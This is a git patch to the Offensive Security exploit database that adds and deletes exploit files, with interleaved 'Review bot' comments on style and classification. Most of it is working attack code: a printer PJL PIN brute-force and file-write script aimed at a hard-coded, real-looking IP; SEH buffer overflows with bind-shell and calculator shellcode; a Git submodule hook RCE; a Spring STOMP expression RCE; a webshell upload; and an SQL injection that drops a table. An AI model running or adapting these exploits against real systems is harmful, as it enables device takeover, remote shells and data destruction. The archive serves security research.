From 32f471140af171ef21960cfd8bcac4f2f4afd877 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 6 Sep 2018 05:01:55 +0000 Subject: [PATCH] DB: 2018-09-06 18 changes to exploits/shellcodes Microsoft people 10.1807.2131.0 - Denial of service (PoC) GNU glibc < 2.27 - Local Buffer Overflow UltraISO 9.7.1.3519 - Buffer Overflow (SEH) JBoss 4.2.x/4.3.x - Information Disclosure Git < 2.17.1 - Remote Code Execution FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH) Monstra CMS 3.0.4 - Remote Code Execution OpenDaylight - SQL Injection Tenda ADSL Router D152 - Cross-Site Scripting Pivotal Spring Java Framework < 5.0 - Remote Code Execution --- exploits/hardware/remote/45332.py | 94 ++++++++++++++++++++++++++ exploits/hardware/webapps/45336.txt | 15 ++++ exploits/java/webapps/44747.txt | 22 ------ exploits/java/webapps/44796.txt | 28 -------- exploits/linux/local/44750.txt | 36 ---------- exploits/linux/remote/44822.txt | 54 --------------- exploits/multiple/remote/44009.c | 85 ----------------------- exploits/php/webapps/44621.txt | 23 ------- exploits/windows_x86-64/dos/45335.txt | 36 ++++++++++ exploits/windows_x86-64/local/45278.py | 52 -------------- exploits/windows_x86/remote/45333.py | 54 +++++++++++++++ files_exploits.csv | 11 ++- 12 files changed, 203 insertions(+), 307 deletions(-) create mode 100755 exploits/hardware/remote/45332.py create mode 100644 exploits/hardware/webapps/45336.txt delete mode 100644 exploits/java/webapps/44747.txt delete mode 100644 exploits/java/webapps/44796.txt delete mode 100644 exploits/linux/local/44750.txt delete mode 100644 exploits/linux/remote/44822.txt delete mode 100644 exploits/multiple/remote/44009.c delete mode 100644 exploits/php/webapps/44621.txt create mode 100644 exploits/windows_x86-64/dos/45335.txt delete mode 100755 exploits/windows_x86-64/local/45278.py create mode 100755 exploits/windows_x86/remote/45333.py 
diff --git a/exploits/hardware/remote/45332.py b/exploits/hardware/remote/45332.py
new file mode 100755
index 000000000..e3dfa7a5a
--- /dev/null
+++ b/exploits/hardware/remote/45332.py
@@ -0,0 +1,94 @@ +# Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution +# Date: 2018-09-05 +# Exploit Author: vr_system +# Vendor Homepage: https://www.fujixerox.com.cn/ +# Software Link: https://www.fujixerox.com.cn/ +# Version: DocuCentre-IV,DocuCentre-VI,DocuCentre-V,ApeosPort-VI,ApeosPort-V +# Tested on: DocuCentre-V 3065,ApeosPort-VI C3371,ApeosPort-V C4475,ApeosPort-V C3375,DocuCentre-VI C2271,ApeosPort-V C5576,DocuCentre-IV C2263,DocuCentre-V C2263,ApeosPort-V 5070 +# CVE : N/A + +# POC:Ability to write files to the printer +#!/usr/bin/env python +# -*- coding: UTF-8 -*- +import socket +import time +PJL_START = "\033%-12345X@PJL " +PJL_FINISH = "\033%-12345X\r\n" + +def Buildsocket(ip,port=9100): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) + sock.settimeout(5) + try: + sock.connect((ip, port)) + except: + print "[!*]-ip-%s-can't connect--" % ip + return 'error' + for i in range(500): + print"bypass pin:{0}".format(i) + PJL_INFO_ID = """JOB PASSWORD={0}\r\n""".format(i) + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + PJL_INFO_ID = """DEFAULT PASSWORD=0\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + + PJL_INFO_ID = """DEFAULT CPLOCK=OFF\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + PJL_INFO_ID = """DEFAULT DISKLOCK=OFF\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + + PJL_INFO_ID = """FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/test4"\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + try: + device = sock.recv(1024) + except:pass + PJL_INFO_ID = """FSUPLOAD NAME="0:/test4" OFFSET=0 SIZE=4\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + try: + device = sock.recv(1024) + except:pass + finally: + sock.close() + print "OK" + +if __name__ == '__main__': + ip = "118.42.125.192" + Buildsocket(ip, port=9100) + +# POC:Ability to view files 
in the printer +##!/usr/bin/env python +# -*- coding: UTF-8 -*- +import socket +PJL_START = "\033%-12345X@PJL " +PJL_FINISH = "\033%-12345X\r\n" + +def Buildsocket(ip, port=9100): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) + sock.settimeout(5) + try: + sock.connect((ip, port)) + except: + print "[!*]-ip-%s-can't connect--" % ip + return 'error' + PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + try: + device = sock.recv(1024) + except:pass + PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) # + try: + device = sock.recv(1024) + except: + return 'No' + print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device) + sock.close() + return 'OK' +if __name__ == '__main__': + Buildsocket("118.42.125.192", port=9100) \ No newline at end of file diff --git a/exploits/hardware/webapps/45336.txt b/exploits/hardware/webapps/45336.txt new file mode 100644 index 000000000..f63c9e54a --- /dev/null +++ b/exploits/hardware/webapps/45336.txt @@ -0,0 +1,15 @@ +# Exploit Title: Tenda D152 ADSL Router - Cross-Site Scripting +# Exploit Author: Sandip Dey +# Date: 2018-07-21 +# Vendor Homepage: http://www.tendacn.com +# Hardware Link: https://www.amazon.in/Tenda-D152-ADSL2-Modem-Router/dp/B00IM8CWTE/ref=sr_1_fkmr0_1?ie=UTF8&qid=1536170904&sr=8-1-fkmr0&keywords=Tenda+D152+ADSL+router +# Category: Hardware +# Tested on: Windows 8.1 +# CVE: CVE-2018-14497 + +# Reproduction Steps: + +Goto your Wifi Router Gateway [i.e: http://Target] +Go to --> "General Setup" --> "Wireless" --> "Basic Settings +Now change the SSID to and hit apply +Refresh the page, and you will get the "Sandip" pop-up \ No newline at end of file diff --git a/exploits/java/webapps/44747.txt b/exploits/java/webapps/44747.txt deleted file mode 100644 index 82e96751d..000000000 --- a/exploits/java/webapps/44747.txt +++ /dev/null 
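Review bot: The title `FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution` (and the matching files_exploits.csv row in this commit) is not supported by the code: the script's own comments say `# POC:Ability to write files to the printer` and `# POC:Ability to view files in the printer`, and the two `Buildsocket` functions only send PJL `JOB PASSWORD=`, `DEFAULT CPLOCK=OFF`, `DEFAULT DISKLOCK=OFF`, `FSDOWNLOAD`, `FSUPLOAD` and `FSDIRLIST` commands to TCP/9100, so the title should describe an arbitrary file write/read via PJL unless the author documents how that becomes command execution. Both `__main__` blocks hard-code `118.42.125.192`, which looks like a real third-party device; take the target from `sys.argv` (adding `import sys`) or use an obvious placeholder so the file is not pointed at that host by default. The `#!/usr/bin/env python` line in the first script sits after the header comments and is `##!/usr/bin/env python` (a plain comment) in the second, and the `print` statements are Python 2 syntax, so a `# Requires: Python 2` line in the header would spare a reader a failed run. For defenders, the strings above are the indicators: PJL `JOB PASSWORD`, `DEFAULT CPLOCK`/`DISKLOCK` changes and `FSDOWNLOAD`/`FSUPLOAD` arriving on port 9100 from outside the print network are what to alert on, and restricting port 9100 to the print segment removes the exposure.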
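Review bot: Step 3 of the reproduction, `Now change the SSID to and hit apply`, has lost its value — the SSID string that triggers the alert was evidently stripped as markup — and the previous line's `"Basic Settings` is missing its closing quote, so the steps as written cannot be followed or verified. The line should at least say that the SSID was set to a string containing HTML markup and name the page on which the stored value is rendered unencoded (the Basic Settings page refreshed in step 4), since output-encoding the SSID there is the fix. The header gives no firmware version for the D152, only `# Tested on: Windows 8.1` for the client; a `# Firmware Version: <version tested>` line would tell a reader which builds are affected. The Amazon `# Hardware Link` carries session query parameters (`ref=`, `qid=`) that can be dropped.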
@@ -1,22 +0,0 @@ -# Exploit Title: OpenDaylight SQL Injection -# Date: 2018-05-24 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: https://www.opendaylight.org -# CVE: CVE-2018-1132 - - -intro: -OpenDaylight (ODL) is a modular open platform for customizing and automating networks of any size and scale. The OpenDaylight Project arose out of the SDN movement, with a clear focus on network programmability. It was designed from the outset as a foundation for commercial solutions that address a variety of use cases in existing network environments. - -attackers can SQL inject the component's database(SQLite) without authenticating to the controller or SDNInterfaceapp. - -The bug is in /impl/src/main/java/org/opendaylight/sdninterfaceapp/impl/database/SdniDataBase.java (line 373~391) - -The SDNI concats port information to build an insert SQL query, and it executes the query in SQLite. -However, in line 386, the portName is a string that can be customized by switches. Since SQLite supports multiple sql queries in one run, -attackers can customize the port name to inject another SQL if they compromise or forge a switch. - -POC: -For example, he can set portName as: -");drop table NAME;// \ No newline at end of file diff --git a/exploits/java/webapps/44796.txt b/exploits/java/webapps/44796.txt deleted file mode 100644 index 430f83ade..000000000 --- a/exploits/java/webapps/44796.txt +++ /dev/null 
@@ -1,28 +0,0 @@ -# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution -# Date: 2018-05-28 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: -# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development -# CVE: CVE: CVE-2018-1270 -# Version: <= 5.0.x - -# Description: By connecting to spring STOMP, and putting the key for "selector" -# header, we can execute code on Spring. - -# POC: -# Here' we are writting java commands to be executed within the selector header -# Connecting to a web socket using SockJS -# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable - -var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"}; - -var socket = new SockJS('/gs-guide-websocket'); -var stompClient = webstomp.over(socket); -stompClient.connect({}, function (frame){ - setConnected(true); - console.log('Connected: ' + frame); - stompClient.subscribe('/topic/greetings', function(greeting){ - showGreeting(JSON.parse(greeting.body).content); - },header); -}); \ No newline at end of file diff --git a/exploits/linux/local/44750.txt b/exploits/linux/local/44750.txt deleted file mode 100644 index 4e90ed59a..000000000 --- a/exploits/linux/local/44750.txt +++ /dev/null 
@@ -1,36 +0,0 @@ -# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow -# Date: 2018-05-24 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: http://www.gnu.org/ -# CVE: CVE-2018-11237 - - -# POC: - -$ cat mempcpy.c -#define _GNU_SOURCE 1 -#include -#include - -#define N 97699 -char a[N]; -char b[N+128]; - -int -main (void) -{ - memset (a, 'x', N); - char *c = mempcpy (b, a, N); - assert (*c == 0); -} -$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy -$ ./mempcpy -mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed. - -The problem is these two lines in memmove-avx512-no-vzeroupper.S: - - vmovups %zmm4, (%rax) - vmovups %zmm5, 0x40(%rax) - -For mempcpy, %rax points to the end of the buffer. \ No newline at end of file diff --git a/exploits/linux/remote/44822.txt b/exploits/linux/remote/44822.txt deleted file mode 100644 index f1494a4ab..000000000 --- a/exploits/linux/remote/44822.txt +++ /dev/null 
@@ -1,54 +0,0 @@ -# Exploit Title: Git (code execution) -# Date: 2018-05-29 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: https://github.com/git/git -# CVE: CVE-2018-11235 - #Version: <=2.17.1 -# Tested on Kali Linux - - -P0C: - -Create two files: -pwned.sh: the file which will contain our commands to be executed -commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file - -add the follwing to Pwned.sh: -#!/bin/sh -cat << EOF - -#here we can put our lovely commands -Exploited! : $(ifconfig) - -EOF - -#-------- - -Add the follwing to commit.sh file: -#!/bin/sh - -set -e - -repo_dir="$PWD/repo" -#change it to any other Repo -repo_submodule='https://github.com/JameelNabbo/SmartWorm' - -git init "$repo_dir" -cd "$repo_dir" -git submodule add "$repo_submodule" pwned -mkdir modules -cp -r .git/modules/pwned modules -cp ../pwned.sh modules/pwned/hooks/post-checkout -git config -f .gitmodules submodule.pwned.update checkout -git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned -git add modules -git submodule add "$repo_submodule" -git add SmartWorm -git commit -am pwned -echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`” - - -—————— -Solution: -https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html \ No newline at end of file diff --git a/exploits/multiple/remote/44009.c b/exploits/multiple/remote/44009.c deleted file mode 100644 index 95f1affb4..000000000 --- a/exploits/multiple/remote/44009.c +++ /dev/null 
@@ -1,85 +0,0 @@ -# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X -# Date: 02/08/2018 -# Exploit Author: JameelNabbo -# Vendor Homepage: http://www.jboss.org -# Software Link: http://jbossas.jboss.org/downloads -# Version: 4.2X. & 4.3.X -# Tested on: Linux Ubuntu -# CVE : CVE-2010-1429 - - - - -1. Description - -By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address. -Example: http://127.0.01/status?full=true - - -2. Proof of Concept - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int socket_connect(char *host, in_port_t port){ - struct hostent *hp; - struct sockaddr_in addr; - int on = 1, sock; - - if((hp = gethostbyname(host)) == NULL){ - herror("gethostbyname"); - exit(1); - } - bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int)); - - if(sock == -1){ - perror("setsockopt"); - exit(1); - } - - if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){ - perror("connect"); - exit(1); - - } - return sock; -} - -#define BUFFER_SIZE 1024 - -int main(int argc, char *argv[]){ - int fd; - char buffer[BUFFER_SIZE]; - - if(argc < 3){ - fprintf(stderr, "Usage: %s \n", argv[0]); - exit(1); - } - - fd = socket_connect(argv[1], atoi(argv[2])); - write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len); - while(read(fd, buffer, BUFFER_SIZE - 1) != 0){ - fprintf(stderr, "%s", buffer); - } - - shutdown(fd, SHUT_RDWR); - close(fd); - return 0; -} - - -3. Solution : -Update to version 4.2.3 or later \ No newline at end of file diff --git a/exploits/php/webapps/44621.txt b/exploits/php/webapps/44621.txt deleted file mode 100644 index 4cc0aa20e..000000000 
--- a/exploits/php/webapps/44621.txt +++ /dev/null @@ -1,23 +0,0 @@ -# Exploit Title: Monstra CMS 3.0.4 Upload Plugin Remote code execution CVE-2018-9037 -# Date: 2018-05-14 -# Exploit Author: Jameel Nabbo -# Vendor Homepage: https://github.com/monstra-cms/monstra -# Software Link: https://github.com/monstra-cms/monstra -# Version: 3.0.4 -# Tested on: MAC OSX -# CVE :CVE-2018-9037 - - -Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file, -which is automatically extracted and may contain .php files. - - -Steps to Reproduce -1: Log in as a user with page editing permissions -2: Upload a plugin archive containing php webshell code -3: After successful upload we can execute the command. - -Then go to: http://127.0.0.1/plugins/{Name_Of_Zip_File_You_Uploaded}/{File_In_Zip}.php - -Solution -Filter plugin content during plugin upload \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45335.txt b/exploits/windows_x86-64/dos/45335.txt new file mode 100644 index 000000000..03df664ac --- /dev/null +++ b/exploits/windows_x86-64/dos/45335.txt 
@@ -0,0 +1,36 @@ +# Exploit Title: Microsoft people 10.1807.2131.0 - Denial of service (PoC) +# Exploit Author : L0RD +# Contact: borna.nematzadeh123@gmail.com +# Date: 2018-09-04 +# Vendor Homepage : https://www.microsoft.com +# Software link: https://www.microsoft.com/en-us/p/microsoft-people/9nblggh10pg8?activetab=pivot:overviewtab +# Version: <= 10.1807.2131.0 +# Tested on: Windows 10 +# CVE: N/A + +# Description: +# Microsoft people desktop application is a contact management app and +# address book included in Microsoft's Windows 8 and 10. +# It allows a user to organize and link contacts from different email +# accounts with a unique graphical interface +# More information : +# https://support.microsoft.com/en-us/help/14103/windows-people-app-help + +# Steps to reproduce: +# 1) Run the python exploit code and copy content of file. +# 2) Open people application +# 3) Click on "new contact (+)" and paste content of "poc.txt" into name filed and save contact +# 4) Crash! + +#!/usr/bin/python + +buffer = "\x41" * 20000 +payload = buffer +try: + f=open("poc.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45278.py b/exploits/windows_x86-64/local/45278.py deleted file mode 100755 index 43a3e8818..000000000 --- a/exploits/windows_x86-64/local/45278.py +++ /dev/null 
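Review bot: The `except:` around the file write is a bare except, so any failure (including a KeyboardInterrupt) is reported only as `File cannot be created` with no reason; `except IOError as e:` and printing `e` keeps the message and says why. The same block can be `with open("poc.txt", "w") as f:` so the handle is closed even if `write` fails — as written, a failing `f.write(payload)` jumps to the handler and skips `f.close()`. The header says `# 4) Crash!` but records nothing about the crash (exception type, faulting module, or whether it is an unhandled exception rather than a hang), which is what a triager needs to separate resource exhaustion from a memory-safety bug; one line under `# Description:` with that detail would make the DoS classification verifiable. The `#!/usr/bin/python` shebang is below the header comments, so it is not honoured, and the `print` statements are Python 2 syntax.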
@@ -1,52 +0,0 @@ -# Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH) -# Date: 2018-08-23 -# Author: Shubham Singh -# Known As: Spirited Wolf [Twitter: @Pwsecspirit] -# Vendor Homepage: https://www.ultraiso.com -# Software Link Download : https://www.ultraiso.com/download.html -# Tested on: Windows 7 Ultimate - 64-bit -# Steps to Reproduce: -# 1. Run the python exploit script, it will create a new -# 2. File with the name "exploit.txt" just copy the text inside "exploit.txt" -# 3. start the UltraISO program. -# 4. In the new window click "Tools" > "Mount To Virtual Drive" . -# 5. Now Paste the content of "exploit.txt" into the field: " Image File ". -# 6. Click "Mount" and you will see a lot of calculators. -# Thanks: corelanc0d3r and PeaceMaker - -#!/usr/bin/env python - -#Badchars \x00\x0a\x0d -shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" -shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" -shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" -shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" -shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01" -shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" -shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75" -shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73" -shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" -shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" -shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" -shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61" -shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53" -shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7" -#Exit intermodular call -shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3" -fill = "\x42" * (126 - len(shellcode)) -junk = "A" * (1064 - len(shellcode) - len(fill)) -#0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe] -#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe) -sjmp = "\xeb\x80\xCC\xCC" -seh = "\xe9\x40\x55" - - -spirit = junk + shellcode + fill + sjmp + seh -try: - 
f=open("exploit.txt","w") - print "[+] Creating %s bytes evil payload.." %len(spirit) - f.write(spirit) - f.close() - print "[+] File created!" -except: - print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/remote/45333.py b/exploits/windows_x86/remote/45333.py new file mode 100755 index 000000000..e9a588484 --- /dev/null +++ b/exploits/windows_x86/remote/45333.py 
@@ -0,0 +1,54 @@ +# Exploit Title: FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH) +# Discovery by: Luis Martinez +# Discovery Date: 2018-09-04 +# Vendor Homepage: http://www.ftpshell.com/ +# Software Link: http://www.ftpshell.com/downloadserver.htm +# Tested Version: 6.80 +# Vulnerability Type: Buffer Overflow (SEH) Local +# Tested on OS: Windows XP Professional SP3 x86 es + +# Steps to Produce the Buffer Overflow (SEH): +# 1.- Run python code : FTPShell_Server_6.80.py +# 2.- Open FTPShell_Server_6.80.txt and copy content to clipboard +# 3.- Open FTPShell Server Administrator +# 4.- Manage FTP Accounts... +# 5.- Add Account Name +# 6.- Paste ClipBoard on "Account name to ban" +# 7.- OK + +#!/usr/bin/env python + +#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c +shellcode = ( +"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" +"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1" +"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c" +"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59" +"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14" +"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93" +"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1" +"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8" +"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf" +"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25" +"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d" +"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73" +"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74" +"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2" +"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1" +"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6" +"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e" +"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff" 
+"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc" +"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19" +"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74" +"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b" +"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11" +"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39") + +nSEH = "\xEB\x06\x90\x90" +SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI + +buffer = "\x41" * 1268 + nSEH + SEH + shellcode +f = open ("FTPShell_Server_6.80.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0f5ae65df..8d22fe506 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5256,6 +5256,7 @@ id,file,description,date,author,type,platform,port 43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows, 43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows, 43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware, +45335,exploits/windows_x86-64/dos/45335.txt,"Microsoft people 10.1807.2131.0 - Denial of service (PoC)",2018-09-05,L0RD,dos,windows_x86-64, 43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos, 43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows, 43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows, 
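Review bot: The header line `# Vulnerability Type: Buffer Overflow (SEH) Local` disagrees with where the file is filed, `exploits/windows_x86/remote/45333.py`, and with the `remote` type in the files_exploits.csv row added in this same commit; the reproduction steps (paste into the FTPShell Server Administrator dialog on the host) support the local classification, so one of the two should change. Step 1 refers to `FTPShell_Server_6.80.py`, the author's original file name, but the file is committed as `45333.py`; the step should name the file as committed. The output file is written with `f = open ("FTPShell_Server_6.80.txt", "w")` and a separate `f.close()`; `with open("FTPShell_Server_6.80.txt", "w") as f: f.write(buffer)` closes it on error as well. The `#!/usr/bin/env python` line sits after the header comments and the script is Python 2 (the `"\x.."` string literals must reach the file as raw bytes, which Python 3's text-mode `open` would re-encode), so a `# Requires: Python 2` note in the header would save a reader a failed run.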
@@ -9855,7 +9856,6 @@ id,file,description,date,author,type,platform,port
 44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows,
 44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows,
 44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows,
-44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
 44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
@@ -9930,7 +9930,6 @@ id,file,description,date,author,type,platform,port
 45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
 45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86,
 45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows,
-45278,exploits/windows_x86-64/local/45278.py,"UltraISO 9.7.1.3519 - Buffer Overflow (SEH)",2018-08-28,"Shubham Singh",local,windows_x86-64,
 45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows,
 45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux,
 45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
@@ -16451,7 +16450,6 @@ id,file,description,date,author,type,platform,port
 44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
-44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
 44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows,
 44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows,
@@ -16720,7 +16718,6 @@ id,file,description,date,author,type,platform,port
 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
